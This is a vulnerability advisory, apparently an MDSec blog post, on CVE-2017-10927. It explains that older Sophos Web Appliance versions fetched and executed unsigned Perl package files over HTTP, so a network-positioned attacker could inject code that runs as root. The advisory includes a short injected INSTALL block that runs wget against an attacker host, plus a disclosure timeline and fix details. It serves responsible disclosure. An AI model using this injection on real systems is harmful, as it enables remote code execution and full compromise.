Blog

Advisory: CVE-2017-10927 – Sophos Web Appliance PPD Injection

15/09/2017 | Author: Admin

Advisory: CVE-2017-10927 – Sophos Web Appliance PPD Injection

Overview

Sophos Web Appliance is a “next generation” anti-malware and content filtering proxy appliance created by Sophos.

Description

During a review of Sophos Web Appliance, MDSec discovered a remote code injection vulnerability that can be exploited by a suitably positioned, unauthenticated attacker within the network.
Versions <4.3.2.1 of the appliance periodically makes a number of requests swa-dynamic.sophosupd.com to retrieve perl package description files, for example:
172.16.1.153 - - [29/Jun/2017 16:55:02] "GET /swa/data/mainline/Sophos-Labs-Data.ppd HTTP/1.1" 200 -
172.16.1.153 - - [29/Jun/2017 16:56:01] "GET /swa/data/mainline/Sophos-App-Control-Data.ppd HTTP/1.1" 200
172.16.1.153 - - [29/Jun/2017 16:57:02] "GET /swa/data/mainline/PureMessage-Sophos-Engine.ppd HTTP/1.1" 200 -

These requests are performed over HTTP, meaning that a suitably positioned attacker within the network is able to intercept communications through either an DNS poisoning or ARP man-in-the-middle attack. The PPD packages retrieved by the appliance contain perl script that is ultimately executed. Furthermore, the user executing this unsigned script has unrestricted sudo privileges allowing for privilege escalation to root.

The attacker is able to gain code execution on the SWA by either replacing the archive, including the install.pl script within it, or by simply injecting arbitrary perl in to the install commands:

<INSTALL EXEC="PPM_PERL">
BEGIN { unlink __FILE__ } # Old ppm workaround
system('wget 192.168.1.2/test');
do './install.pl' || die "Install script did not succeed!\n$@$!\n";
</INSTALL>

This issue was resolved in version 4.3.2.1 of the appliance.

Timeline

30-06-2017: MDSec contact security@sophos.com who provided the security-alert@ contact
30-06-2017: MDSec provide a PGP encrypted report of the vulnerability
30-06-2017: Sophos acknowledge receipt and pass the report on to the relevant team
30-06-2017: Sophos acknowledge the vulnerability as a known problem
18-07-2017: Sophos provide update reporting fix is causing issues and further trials are required
01-08-2017: Sophos contact MDSec documenting the fix is in place, they are now using cert pinning
08-08-2017: MDSec request permission to disclose
22-08-2017: Sophos confirm they’re happy to disclose this issue

Credits

This vulnerability was identified by @domchell.

MDSec would like to thank Sophos for their assistance in resolving and disclosing this vulnerability.

Ready to start testing your applications?

Speak to one of our industry experts and find out how MDSec can help your business.

+44 (0) 1625 263 503

contact@mdsec.co.uk